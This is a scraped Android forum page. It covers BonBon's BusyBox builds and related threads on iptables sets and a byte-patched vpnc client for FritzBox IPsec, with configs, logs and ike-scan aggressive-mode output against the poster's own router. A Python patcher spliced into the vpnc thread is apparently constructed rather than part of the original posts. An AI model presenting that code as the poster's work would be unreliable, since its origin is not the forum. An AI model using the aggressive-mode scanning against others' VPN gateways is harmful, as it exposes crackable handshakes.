[BUSYBOX] [INSTALLER] BonBon's busybox [25/11/2015] - Android Software/Hacking General [Developers Only]

BUSYBOX
Next part is copied from the official busybox website:
BusyBox: The Swiss Army Knife of Embedded Linux
BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides replacements for most of the utilities you usually find in GNU fileutils, shellutils, etc. The utilities in BusyBox generally have fewer options than their full-featured GNU cousins; however, the options that are included provide the expected functionality and behave very much like their GNU counterparts. BusyBox provides a fairly complete environment for any small or embedded system.
These are my builds of busybox for ARM, x86 and MIPS devices. They'll always be up to date and compiled with speed and resources in mind.
Why use these builds?
Compared to other busybox builds, I have a few additional applets and other obsolete ones removed. There are also some speed and size tweaks in place. But the main improvement is the three busybox versions:
A full one, that has all the applets an android user could ever dream of.
A modular build, that is suited for everyday users
A minimalistic build, that only has core applets often needed for scripting.
[If you want your own custom build of busybox with just specific applets, PM me and we'll talk about it :highfive:]
In which situations to use what builds?
Minimalistic
It's ideal for mod makers or other script creators to include the minimalistic build inside their work, for ensured compatibility and speed / size optimizations!
> Download <
Applets:
[, [[, ash, awk, base64, basename, bash, beep, bootchartd, cal, cat,
chattr, chgrp, chmod, chown, chroot, cksum, clear, cmp, comm, cp, cpio,
cttyhack, cut, date, dc, dd, depmod, df, diff, dirname, dmesg,
dos2unix, du, echo, egrep, env, expand, expr, false, fdisk, fgrep,
find, fold, free, fsck, fsck.minix, fstrim, fsync, fuser, getopt, grep,
groups, gunzip, gzip, halt, head, id, insmod, install, ip, ipaddr,
iplink, iprule, iptunnel, kill, killall, killall5, last, less, ln,
logger, logread, ls, lsattr, lsmod, md5sum, mesg, mkdir, mkdosfs,
mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkswap,
mktemp, modinfo, modprobe, more, mount, mountpoint, mv, nanddump,
nandwrite, nice, nohup, od, openvt, patch, pgrep, pidof, ping,
pipe_progress, pkill, pmap, poweroff, powertop, printenv, printf, ps,
pscan, pstree, pwd, pwdx, readahead, readlink, realpath, reboot,
renice, reset, resize, rm, rmdir, rmmod, rpm, rpm2cpio, run-parts, sed,
seq, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey, shuf, sleep,
sort, split, start-stop-daemon, stat, stty, sum, swapoff, swapon,
switch_root, sync, sysctl, syslogd, tac, tail, tar, tee, test, time,
timeout, top, touch, tr, true, truncate, tty, tune2fs, umount, uname,
unexpand, uniq, unix2dos, unxz, unzip, uptime, users, usleep, uudecode,
uuencode, watch, wc, wget, which, who, xargs, xz, xzcat, yes, zcat
Modular
The modular build is just what you need if someone or something needs busybox installed. It has everything needed for regular android use
> Download <
Applets:
[, [[, acpid, adjtimex, arp, arping, ash, awk, base64, basename, bash,
bbconfig, beep, blkid, blockdev, cal, cat, chattr, chgrp, chmod, chown,
chroot, chvt, cksum, clear, cmp, comm, cp, cpio, crond, crontab,
cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem, df, diff,
dirname, dmesg, dnsd, dnsdomainname, dos2unix, du, dumpkmap, echo,
egrep, env, envdir, envuidgid, expand, expr, fakeidentd, false,
fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgconsole, fgrep,
find, findfs, flash_lock, flash_unlock, flashcp, flock, fold, free,
freeramdisk, fsck, fsck.minix, fstrim, fsync, ftpd, ftpget, ftpput,
fuser, getopt, grep, groups, gunzip, gzip, halt, hd, head, hexdump,
hostname, hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, inotifyd,
insmod, install, ionice, iostat, ip, ipaddr, ipcalc, iplink, iproute,
iprule, iptunnel, kbd_mode, kill, killall, killall5, less, ln,
loadkmap, logger, logread, losetup, ls, lsattr, lsmod, lsof, lspci,
lsusb, makedevs, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mke2fs,
mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkswap, mktemp, modinfo,
modprobe, more, mount, mountpoint, mpstat, mv, nameif, nanddump,
nandwrite, nbd-client, nc, netstat, nice, nmeter, nohup, nslookup, od,
openvt, patch, pgrep, pidof, ping, ping6, pipe_progress, pivot_root,
pkill, pmap, poweroff, printenv, printf, ps, pscan, pstree, pwd, pwdx,
raidautorun, rdate, rdev, readlink, readprofile, realpath, reboot,
renice, reset, resize, rm, rmdir, rmmod, route, rpm, rpm2cpio, rtcwake,
run-parts, rx, script, scriptreplay, sed, seq, setconsole, setkeycodes,
setlogcons, setserial, setsid, setuidgid, sh, sha1sum, sha256sum,
sha3sum, sha512sum, showkey, shuf, slattach, sleep, smemcap, softlimit,
sort, split, start-stop-daemon, stat, strings, stty, sum, svlogd,
swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar,
tcpsvd, tee, test, tftp, tftpd, time, timeout, top, touch, tr,
traceroute, traceroute6, true, truncate, tty, ttysize, tune2fs,
ubiattach, ubidetach, ubimkvol, ubirmvol, ubirsvol, ubiupdatevol,
umount, uname, unexpand, uniq, unix2dos, unlink, unxz, unzip, uptime,
usleep, uudecode, uuencode, vconfig, volname, watch, watchdog,
wc, wget, which, whois, xargs, xz, xzcat, yes, zcat, zcip
Full
And ROM and OS creators could benefit from including the full build to their packages as it has every single applet an android system might need.
> Download <
Applets:
[, [[, acpid, adjtimex, arp, arping, ash, awk, base64, basename, bash,
bbconfig, beep, blkid, blockdev, bootchartd, bunzip2, bzcat, bzip2,
cal, cat, catv, chattr, chgrp, chmod, chown, chpst, chroot, chrt, chvt,
cksum, clear, cmp, comm, conspy, cp, cpio, crond, crontab, cryptpw,
cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem, df, diff,
dirname, dmesg, dnsd, dnsdomainname, dos2unix, du, dumpkmap, echo, ed,
egrep, env, envdir, envuidgid, expand, expr, fakeidentd, false,
fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgconsole, fgrep,
find, findfs, flash_lock, flash_unlock, flashcp, flock, fold, free,
freeramdisk, fsck, fsck.minix, fstrim, fsync, ftpd, ftpget, ftpput,
fuser, getopt, grep, groups, gunzip, gzip, halt, hd, head, hexdump,
hostname, httpd, hush, hwclock, i2cdetect, i2cdump, i2cget, i2cset, id,
ifconfig, ifenslave, ifplugd, inetd, init, inotifyd, insmod, install,
ionice, iostat, ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, iproute,
iprule, iptunnel, kbd_mode, kill, killall, killall5, less, linuxrc, ln,
loadkmap, logger, login, logread, losetup, lpd, lpq, lpr, ls, lsattr,
lsmod, lsof, lspci, lsusb, lzcat, lzma, lzop, lzopcat, makedevs,
md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mke2fs, mkfifo,
mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkpasswd, mkswap, mktemp,
modinfo, modprobe, more, mount, mountpoint, mpstat, msh, mv, nameif,
nanddump, nandwrite, nbd-client, nc, netstat, nice, nmeter, nohup,
nslookup, od, openvt, patch, pgrep, pidof, ping, ping6, pipe_progress,
pivot_root, pkill, pmap, poweroff, printenv, printf, ps, pscan, pstree,
pwd, pwdx, raidautorun, rdate, rdev, readahead, readlink, readprofile,
realpath, reboot, renice, reset, resize, rev, rfkill, rm, rmdir, rmmod,
route, rpm, rpm2cpio, rtcwake, run-parts, runsv, runsvdir, rx, script,
scriptreplay, sed, seq, setconsole, setkeycodes, setlogcons, setserial,
setsid, setuidgid, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey,
shuf, slattach, sleep, smemcap, softlimit, sort, split,
start-stop-daemon, stat, strings, stty, sulogin, sum, svlogd, swapoff,
swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset,
tcpsvd, tee, telnet, test, tftp, tftpd, time, timeout, top, touch, tr,
traceroute, traceroute6, true, truncate, tty, ttysize, tune2fs,
ubiattach, ubidetach, ubimkvol, ubirmvol, ubirsvol, ubiupdatevol,
udhcpc6, udpsvd, uevent, umount, uname, unexpand, uniq, unix2dos,
unlink, unlzma, unlzop, unxz, unzip, uptime, users, usleep, uudecode,
uuencode, vconfig, vi, vlock, volname, watch, watchdog, wc, wget,
which, who, whois, xargs, xz, xzcat, yes, zcat, zcip
I can only test the ARM and x86 binary, so remember, I can't be held responsible for any damage that's been done to your device!
Seriously talking, the installer can't really break anything, so if you encounter problems or don't like my version of busybox, just install your previous one. :good:
If you have an applet you want included or removed, please let me know through the feature request tab!
Thanks to:
- The guys working on busybox, they're making excellent work!
[ See the full list of busyboxes developers, here ]
- Google
I need a tester for the x86 and MIPS binaries! If you want to help, PM me!
Ask before using my work in yours, so I can link it here! And add proper credits
Donations aren't expected, but are appreciated
XDA:DevDB Information
BonBon's busybox build, Tool/Utility for all devices (see above for details)
Contributors
_Bon_Bon
Source Code: https://github.com/DevBonBon/BonBons-Busybox
Version Information
Status: Stable
Current Stable Version: 1.24.1-BonBon
Stable Release Date: 2015-11-25
Created 2015-11-20
Last Updated 2015-12-13

Changelog:
13/12/2015
- Removed applet: Wall, as it doesn't work on android
- Modified build to fix few bugs on older devices
- Modified build to add speed and to reduce size
- Modified build to better suit the different busybox builds
- Moved back to previous way of removing old busybox symlinks, using find, to more completely delete them
Known issues:
The installer, when symlinking applets, will always say: symlinked xbin.
This is merely a cosmetic bug and will be fixed in the next release
Previous versions:
Code:
25/11/2015
- Some minor fixes to installer
- Some tweaks to text appearance
- Made previous busybox version shown during installation
23/11/2015
- Some minor fixes to the installer
22/11/2015
- Added full build
- Added Minimal build
- Removed few applets from modular build as they were obsolete / breaking things
- Added few applets and features to modular build
20/11/2015
- Initial build

where or better is there any difference to other one?????

-CALIBAN666- said:
where or better is there any difference to other one?????
Well, compared to Stericson's busybox, I have a few applets removed and others added. There are also some speed and size tweaks in place. But that's not why I made this thread. I'll be posting two more busybox builds: A full one, that has all the applets an android user could ever dream of and a minimalistic build, that only has core applets often needed for scripting. It's ideal for mod makers or other script creators to include the minimalistic build inside their work, for ensured compatibility and speed / size optimizations! And ROM and OS creators could benefit from including the full build to their packages. Also, my builds are more easily accessed. I'll be here, building these versions as long as I'll have an android phone. All you'll have to do to influence how and when I build them, is to ask!
But none of this is to say that Stericson's busybox is somehow worse than mine. No, it's a great build that has everything you normally need AND he even built a custom installer app for it!

nice,big thanx to you,keep it up.

Nice job @_Bon_Bon. Any chance you could make a full build SELinux enabled? Also I am not sure what's going on with nslookup (it works but reports an error):
Code:
bash-3.2# nslookup foo.com
nslookup: can't resolve '(null)'
Name: foo.com
Address 1: 23.21.224.150 ec2-23-21-224-150.compute-1.amazonaws.com
Address 2: 23.21.179.138 ec2-23-21-179-138.compute-1.amazonaws.com

Miche1asso said:
Nice job @_Bon_Bon. Any chance you could make a full build SELinux enabled? Also I am not sure what's going on with nslookup (it works but reports an error):
Code:
bash-3.2# nslookup foo.com
nslookup: can't resolve '(null)'
Name: foo.com
Address 1: 23.21.224.150 ec2-23-21-224-150.compute-1.amazonaws.com
Address 2: 23.21.179.138 ec2-23-21-179-138.compute-1.amazonaws.com
Thanks
I've tried to build with Selinux enabled a few times, but it always fails.
And I really can't say what's going on with your nslookup. I'll look into that and Selinux once the next version's out, as it fixes many bugs :good:

_Bon_Bon said:
Thanks
I've tried to build with Selinux enabled a few times, but it always fails.
And I really can't say what's going on with your nslookup. I'll look into that and Selinux once the next version's out, as it fixes many bugs :good:
Don't get me wrong, have you tried the instructions from this post: http://forum.xda-developers.com/and...de-busybox-snapshot-building-android-t2857650 ?
In that one the SELinux extension is working. Too bad that the resulting busybox has address translation not working (that's why I checked nslookup on yours). Commands like "ping google.com" return unknown host. Still, for that reason I am using your one now.

Miche1asso said:
Don't get me wrong, have you tried the instructions from this post: http://forum.xda-developers.com/and...de-busybox-snapshot-building-android-t2857650 ?
In that one the SELinux extension is working. Too bad that the resulting busybox has address translation not working (that's why I checked nslookup on yours). Commands like "ping google.com" return unknown host. Still, for that reason I am using your one now.
I haven't really looked into Selinux at all yet, but I see that I must have a few libraries missing. I might include a selinux build in the version already, but if anything, it'll come in the one after that

Downloading...

A new version is currently in testing...

_Bon_Bon said:
A new version is currently in testing...
Hi please am currently on kushan Rom v9 lite and anytime I update my busy box from v40 to the latest version I get "no kernel support for steaks." Can you please answer on why?
@HiSyb

HIS YB said:
Hi please am currently on kushan Rom v9 lite and anytime I update my busy box from v40 to the latest version I get "no kernel support for steaks." Can you please answer on why?
@HiSyb
I don't know the rom, but my guess is that the busybox build you're updating to lacks some binaries that stweaks needs. If you can find out which, you can try and get those applets

Related

Need Iptables With Set Implementation

Hi, I'm doing some porting for the phone.
Everything goes fine but except...
# iptables -A INPUT -p tcp --sport 80 --tcp-flags FIN,SYN,RST,ACK SYN,ACK -m state --state ESTABLISHED -m set --match-set NOCLIP src -j ZHANG
FIX ME! implement getprotobyname() bionic/libc/bionic/stubs.c:372
iptables v1.3.7: Couldn't find match `set'
A patched ipset works and the kernel modules of it seems to be loaded correctly and I can define sets.
# ipset -L GOOGLE
Name: GOOGLE
Type: nethash
References: 1
Header: hashsize: 225 probes: 1 resize: 50
Members:
64.233.160.0/19
8.6.48.0/21
64.68.88.0/21
4.3.2.0/24
66.249.64.0/19
173.194.0.0/16
8.8.8.0/24
74.125.0.0/16
8.8.4.0/24
216.239.32.0/19
209.85.128.0/17
66.102.0.0/20
72.14.192.0/18
64.68.80.0/21
So there are problems with iptables.
I've looked into external/iptables/Android.mk and found that set is not enabled, and this version of iptables doesn't seem to know --match-set. Abort.
And I also tried the latest one which version number is 1.4.7 on github but I can't get it compiled.
And if you are Chinese and you are interested in FanQiang(f***ing GFW) contact me and let's do it together. As far as I know now only tor works on Android phone except VPN.

VPNC to FritzBox works!!!!

YES with this patched vpnc you can connect from a rooted desire (or any other android device) to your AVM fritzbox with the original firmware. The included vpnc-script will help to fix the routing problems.
You need a rooted Android device with a tun.ko module
First setup your fritzbox like the iphone setup which is described at the avm portal (google-> "avm iphone vpn")
Install signed-FritzBox.apk to your phone.
Setup now your vpnc-gui and be happy.
--------------------------------------------------------------------------
Some detailed infos how to connect the Fritzbox with IPSEC via VPNC:
1.) you must use an IKE_ATTRIB_LIFE_DURATION = 3600 (seconds)
2.) you must use draft-ietf-ipsec-nat-t-ike-03
The original vpnc uses an IKE_ATTRIB_LIFE_DURATION of 2147483 (seconds) and only uses draft-ietf-ipsec-nat-t-ike-00 -> 02.
I changed the timing to 3600 (seconds) and changed the transformset 02 to 03.
Timing -> find in vpnc 000020C49B and change it to 0000000E10 (2x)
Transformset -> find in vpnc CD60464335DF21F87CFDB2FC68B6A448 and change it to 7D9419A65310CA6F2C179D9215529D56 (1x)
By the way, this patch will help any vpnc user on every Linux (I tested this with Ubuntu and it works perfectly)
----------------------------------------------------------------------------
update 20.12.2010
----------------------------------------------------------------------------
New APK to install on a rooted Android device. After installing you can connect via IPSEC VPN to a cisco device and to the FritzBox with the latest Firmware without modifying the FritzBox
For all who want to use the FritzPhone App to make phone calls via vpnc this will not work because the app did not use the 3G interface (only wlan). Download the app "3cx" from the market and in the setup menu "integration" you will find "Enable 3G", that's all.
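The byte edits listed in the post above, written as a checked patcher (an added example, not mp1405's tool and not code from the original post). The hex patterns and occurrence counts are the post's; the function names and the sample blob are constructed for illustration, and the "patched" classification is a heuristic.

```python
"""Checked byte patcher for the two vpnc edits listed in the post."""
from __future__ import annotations

from typing import NamedTuple


class Patch(NamedTuple):
    name: str
    find: bytes      # bytes present in the unmodified binary
    replace: bytes   # bytes written in their place (same length)
    expected: int    # how many occurrences the post says to change


# Patterns and counts exactly as given in the post.
PATCHES = (
    Patch("ike_lifetime", bytes.fromhex("000020C49B"),
          bytes.fromhex("0000000E10"), 2),
    Patch("natt_vendor_id", bytes.fromhex("CD60464335DF21F87CFDB2FC68B6A448"),
          bytes.fromhex("7D9419A65310CA6F2C179D9215529D56"), 1),
)


def offsets(data: bytes, needle: bytes) -> list[int]:
    """Return every non-overlapping offset of needle in data."""
    found, pos = [], data.find(needle)
    while pos != -1:
        found.append(pos)
        pos = data.find(needle, pos + len(needle))
    return found


def lifetime_seconds(pattern: bytes) -> int:
    """Decode a timing pattern as a big-endian integer number of seconds."""
    return int.from_bytes(pattern, "big")


def classify(data: bytes) -> str:
    """'original' if every old pattern occurs exactly as often as the post
    says, 'patched' if no old pattern is left and the new ones are present
    (heuristic), otherwise 'unknown' (different build: do not touch it)."""
    old = [len(offsets(data, p.find)) for p in PATCHES]
    new = [len(offsets(data, p.replace)) for p in PATCHES]
    want = [p.expected for p in PATCHES]
    if old == want:
        return "original"
    if not any(old) and all(n >= w for n, w in zip(new, want)):
        return "patched"
    return "unknown"


def apply_patches(data: bytes) -> bytes:
    """Return a patched copy; refuse anything that is not a clean match."""
    state = classify(data)
    if state != "original":
        raise ValueError(f"refusing to patch: binary looks {state}")
    out = bytearray(data)
    for p in PATCHES:
        if len(p.find) != len(p.replace):
            raise ValueError(f"{p.name}: replacement would shift offsets")
        for off in offsets(data, p.find):
            out[off:off + len(p.find)] = p.replace
    return bytes(out)


def patch_file(src: str, dst: str) -> None:
    """Read src, write the patched copy to dst; src is never modified."""
    with open(src, "rb") as fh:
        patched = apply_patches(fh.read())
    with open(dst, "wb") as fh:
        fh.write(patched)


# Constructed stand-in for the vpnc binary: filler bytes around the patterns.
SAMPLE = (b"\x7fELF" + b"\x90" * 16
          + PATCHES[0].find + b"\xaa" * 8
          + PATCHES[0].find + b"\xbb" * 8
          + PATCHES[1].find + b"\xcc" * 4)

if __name__ == "__main__":
    for p in PATCHES:
        print(p.name, "at", [hex(o) for o in offsets(SAMPLE, p.find)])
    print("lifetime:", lifetime_seconds(PATCHES[0].find), "->",
          lifetime_seconds(PATCHES[0].replace), "seconds")
    print("after patching:", classify(apply_patches(SAMPLE)))
```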
Hi there!
Really nice one but I'm getting a forced closed when I push the connect button.
I'm using a SE X10 with android 2.1.........
Sometimes I hate my phone.......
Merry Christmas.
Is your device rooted and does the vpnc have exec permissions?
Please install "Quick System Info" and check the loginfos via the Logcat.
Maybe in your Kernel the tun.ko is missing.
Hello
@mp1405
Thanks for the signed-FritzBox.apk. I finally got it running on my Samsung I9000 Froyo XXJPU and Fritzbox 7390
First I had also the FC because the tun.ko was missing. Now it works, but I have to load the kernel module every reboot in the console with insmod /system/lib/modules/tun.ko
I edited the file /init.rc with the line insmod /system/lib/modules/tun.ko but every reboot a "recovery" init.rc is loaded without my insmod line. There was also the tip to copy the tun.ko into /lib/modules/tun.ko but the tun.ko gets deleted after every reboot.
Kind regards
@mp1405
Thanks for your work and time for this patched Version.
For my understanding:
IPSec ID is what ? My e-Mailadress from the FritzboxConfig ?
IPSec Secret is the Passphrase ?
Is this correct ?
Thanks!
Hello
IPSec ID: Yes, your e-Mailadress from the FritzboxConfig (it is the entry "user_fqdn" which you have to replace with "key_id" in the config).
IPSec Secret: Is the Passphrase (also named Pre-Shared Key or just "key") in the Fritzbox Configs.
Perfect! It works with the correct tun.ko
Thanks @all and mp1405 for this patched Version.
my fritzbox said The import of the VPN-Settings failed.
And I did it twice exactly with the iphone settings.
anyone else with that kind of problem?
I'm using Fritzbox 7270 fon with the latest firmware.
stephen
@stephen21
have the same problem with 7270, every cfg that is "touched" with any editor doesn't work.
I contacted the AVM support and am waiting for the answer.
Greetings
meinbier
PS. Sorry for my bad english
Thanks for the apk and the howto,
I've done everything as described, but I get always following (log) message :
Code:
D/VPN_Connections( 5436): process stderr: no response from target
@sky01x
Hi Sky, where You have found the right tun.ko?
Thanks for a hint.
To.
@lier99
I got the tun.ko from:
http://forum.xda-developers.com/showthread.php?t=793712
Best regards
I9000XXJPY
Kernel 2.6.32.9 hardcore k12h-500hz #2
XXJPY_Doc_v7_Kitchen
Fritzbox 7270
Thanks for the apk and the howto,
but still a little trouble.
The Fritzbox cfg is changed according to ipfone config from AVM.
The VPN Connections says connected.
The Fritzbox says Status green, I have an internet IP, I see my assigned IP, but for the local net I get 0.0.0.0. From there I do not get into my local network. When ever I try to change the Fritzbox cfg to
phase2localid {
ipnet {
ipaddr = 192.168.1.0;
mask = 255.255.255.0;
}
}
phase2remoteid {
ipaddr = 192.168.1.203;
}
phase2ss = "esp-all-all/ah-none/comp-all/no-pfs";
accesslist =
"permit ip 192.168.1.0 255.255.255.0 192.168.1.203 255.255.255.255";
like my Notebook runs fine on the tunnel, the connection failed.
Any idea?
VPN doesn't work via GSM/UMTS connection
Hello,
need help, my VPN doesn't work via GSM/UMTS connection.
My configuration:
FritzBox 7170 with Firmware-Version 29.04.86-18946 (Laborversion)
and VPN configured as IPhone.
Dynamic DNS is active and ready.
Handy HTC Desire with LeeDriod v2.03c
VPNC from mp1405 singned-myVPNC.apk
now if I'm connected via WLAN to my FritzBox I have a VPN connection,
but via GSM or UMTS I get no connection - why?
Thanks
Thanks for your great work! My 7270 shows connection established.
However there seems to be a problem with your vpnc-script. I'm getting a
Device "default via <UMTS-IP> dev rmnet0 " does not exist.
Error: either "to" is duplicate, or "hoplimit" is a garbage.
backing up dns settings
vpnc-script ran to completion
on the console. Maybe I can further look into it tonight.
#Running Leedroid2.3a
mp1405 said:
----------------------------------------------------------------------------
update 20.12.2010
----------------------------------------------------------------------------
New APK to install on a rooted Android device. After installing you can connect via IPSEC VPN to a cisco device and to the FritzBox with the latest Firmware without modifying the FritzBox
So, do you mean that i need only to install the attached signed-myVPNC.apk and i can connect to my fritz without doing the iphone patching procedure on the fritz side? or i need to do it anyway?
does this apk work with gingerbread too?
update:
i imported the modified vpn config to my fritz, installed the signed VPN Connect.apk and set up the account, and tried to connect, it says connected on both Android and my fritz, but i cannot connect to addresses inside my fritz.
the build of android i use (NexusHD2 - Gingerbread 2.2) seems to have a tun.so file, so i don't need to import it, right?
what else can i do ??
mp1405 said:
...
For all who want to use the FritzPhone App to make phone calls via vpnc this will not work because the app did not use the 3G interface (only wlan). Download the app "3cx" from the market and in the setup menu "integration" you will find "Enable 3G", that's all.
Hi,
Thank you for this. The last thing that I will not get to work is to connect with Fritz!box fon to the box across 3g
I have downloaded the 3cx and enabled "Enable 3g" without any other settings in the profile. But in fritz!box fon there the "not connected" is remaining. Any other hints?
Android "DHD Leedroid 2.2.2"
FritzBox "7270 Firmware 54.04.88"
Thx
I am running a HD2 with the latest CM7 ROM and I have a FritzBox 3270 with the latest firmware.
Thanks to this I can finally establish a VPN connection with my phone.
not work for me
Fritzbox config:
vpncfg {
connections {
enabled = yes;
conn_type = conntype_user;
name = "my mail";
always_renew = no;
reject_not_encrypted = no;
dont_filter_netbios = yes;
localip = 0.0.0.0;
local_virtualip = 0.0.0.0;
remoteip = 0.0.0.0;
remote_virtualip = 192.168.178.201;
remoteid {
key_id = "my mail";
}
mode = phase1_mode_aggressive;
phase1ss = "all/all/all";
keytype = connkeytype_pre_shared;
key = "my key";
cert_do_server_auth = no;
use_nat_t = yes;
use_xauth = yes;
use_cfgmode = no;
xauth {
valid = yes;
username = "my login";
passwd = "mypass";
}
phase2localid {
ipnet {
ipaddr = 192.168.178.0;
mask = 255.255.255.0;
}
}
phase2remoteid {
ipaddr = 192.168.178.201;
}
phase2ss = "esp-all-all/ah-none/comp-all/pfs";
accesslist =
"permit ip 192.168.178.0 255.255.255.0 192.168.178.201 255.255.255.255";
}
ike_forward_rules = "udp 0.0.0.0:500 0.0.0.0:500",
"udp 0.0.0.0:4500 0.0.0.0:4500";
}
// EOF
And log from android (MIUI):
pre-init phase...
connect phase...
vpnc-script ran to completion
quick mode response rejected: (ISAKMP_N_INVALID_MESSAGE_ID)(9)
this means the concentrator did not like what we had to offer.
Possible reasons are:
* concentrator configured to require a firewall
this locks out even Cisco clients on any platform expect windows
which is an obvious security improvment. There is no workaround (yet).
* concentrator configured to require IP compression
this is not yet supported by vpnc.
Note: the Cisco Concentrator Documentation recommends against using
compression, expect on low-bandwith (read: ISDN) links, because it
uses much CPU-resources on the concentrator
vpnc version 0.5.3-mjm1-140M
S1 init_sockaddr
[2011-07-29 21:05:48]
S2 make_socket
[2011-07-29 21:05:48]
S3 setup_tunnel
[2011-07-29 21:05:48]
using interface tun0
S4 do_phase1_am
[2011-07-29 21:05:48]
S4.1 create_nonce
[2011-07-29 21:05:48]
S4.2 dh setup
[2011-07-29 21:05:48]
S4.3 AM packet_1
[2011-07-29 21:05:48]
S4.4 AM_packet2
[2011-07-29 21:05:49]
(Xauth)
(DPD)
(Nat-T 03)
(unknown)
got ike lifetime attributes: 3600 seconds
IKE SA selected psk+xauth-aes256-sha1
ignoring that peer is DPD capable (RFC3706)
peer is NAT-T capable (draft-03)
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
S4.5 AM_packet3
[2011-07-29 21:05:49]
NAT status: this end behind NAT? YES -- remote end behind NAT? YES
NAT-T mode, adding non-esp marker
S4.6 cleanup
[2011-07-29 21:05:49]
S5 do_phase2_xauth
[2011-07-29 21:05:49]
S5.1 xauth_start
[2011-07-29 21:05:49]
S5.2 notice_check
[2011-07-29 21:05:49]
S5.3 type-is-xauth check
[2011-07-29 21:05:49]
S5.4 xauth type check
[2011-07-29 21:05:49]
S5.5 do xauth authentication
[2011-07-29 21:05:49]
NAT-T mode, adding non-esp marker
S5.2 notice_check
[2011-07-29 21:05:49]
S5.3 type-is-xauth check
[2011-07-29 21:05:49]
S5.6 process xauth response
[2011-07-29 21:05:49]
NAT-T mode, adding non-esp marker
S5.7 xauth done
[2011-07-29 21:05:49]
S6 do_phase2_config
[2011-07-29 21:05:49]
S6.1 phase2_config send modecfg
[2011-07-29 21:05:49]
NAT-T mode, adding non-esp marker
S6.2 phase2_config receive modecfg
[2011-07-29 21:05:50]
got save password setting: 0
got address 192.168.178.201
S7 setup_link (phase 2 + main_loop)
[2011-07-29 21:05:50]
S7.0 run interface setup script
[2011-07-29 21:05:50]
S7.1 QM_packet1
[2011-07-29 21:05:50]
S7.2 QM_packet2 send_receive
[2011-07-29 21:05:50]
NAT-T mode, adding non-esp marker
S7.3 QM_packet2 validate type
[2011-07-29 21:05:50]
S7.4 process and skip lifetime notice
[2011-07-29 21:05:50]
S7.5 QM_packet2 check reject offer
[2011-07-29 21:05:50]
---!!!!!!!!! entering phase2_fatal !!!!!!!!!---
NAT-T mode, adding non-esp marker
NAT-T mode, adding non-esp marker
disconnect phase...
ip: can't find device 'tun0'
ip: an inet prefix is expected rather than ""
ip: RTNETLINK answers: No such process
DNS not restored (no active default gateway)
Please help me. What I should do ?
If this helps the developers to keep the stuff up to date, here's the Handshake from a fritzbox 7240 v. Firmware-Version 73.05.05 with default vpn config:
Code:
~$ ike-scan -v -s 0 --aggressive --id=xxxxxxxxxxxxx fritz.box
DEBUG: pkt len=380 bytes, bandwidth=56000 bps, int=58285 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x Aggressive Mode Handshake returned
HDR=(CKY-R=a79e96b1e2acf788)
SA=(Enc=3DES Hash=SHA1
Auth=PSK Group=2:modp1024
LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(16 bytes)
ID(Type=ID_IPV4_ADDR, Value=xxxxxxxx)
Hash(20 bytes)
Notification=(Type=RESPONDER-LIFETIME, SPI=741b17c61bce146aa79e96b1e2acf788,
Data=800b0001800c0e10)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100
(Dead Peer Detection v1.0)
Ending ike-scan 1.9: 1 hosts scanned in 0.269 seconds (3.72 hosts/sec). 1 returned handshake; 0 returned notify
The fritzbox only answers aggressive mode, this may be the reason for faulting android vpn client, see android system logs...
Code:
Get osmonitor app exported logcat log (no permissions over sshfs):
$ scp htc:/mnt/sdcard/log1 .
grep it for ipsec vpn racoon:
08/03/2011 17:03:50 [INFORMATION] racoon(7090) ipsec-tools 0.7.3 (http://ipsec-tools.sf.net)
08/03/2011 17:01:44 [INFORMATION] ActivityManager(118) Displayed com.android.settings/.vpn.VpnSettings: +312ms
08/03/2011 17:01:57 [DEBUG] com.android.settings.vpn.AuthenticationActor(3067) ~~~~~~ connect() succeeded!
at com.android.server.vpn.VpnService.getIp(VpnService.java:108)
at com.android.server.vpn.VpnService.onConnect(VpnService.java:135)
at com.android.server.vpn.VpnServiceBinder$2.run(VpnServiceBinder.java:117)
08/03/2011 17:01:58 [INFORMATION] ipd(77) IP CMD: /system/bin/ip ru del from all to all table vpn prio 2500
08/03/2011 17:02:06 [INFORMATION] ActivityManager(118) Displayed com.android.settings/.vpn.VpnEditor: +479ms
08/03/2011 17:03:39 [INFORMATION] ActivityManager(118) Displayed com.android.settings/.vpn.VpnSettings: +328ms
08/03/2011 17:03:49 [DEBUG] com.android.settings.vpn.AuthenticationActor(3067) ~~~~~~ connect() succeeded!
at com.android.server.vpn.VpnService.waitUntilConnectedOrTimedout(VpnService.java:210)
at com.android.server.vpn.VpnService.onConnect(VpnService.java:139)
at com.android.server.vpn.VpnServiceBinder$2.run(VpnServiceBinder.java:117)
08/03/2011 17:04:35 [INFORMATION] ipd(77) IP CMD: /system/bin/ip ru del from all to all table vpn prio 2500
08/03/2011 17:01:57 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:01:57 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:01:57 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
08/03/2011 17:01:58 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:01:58 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
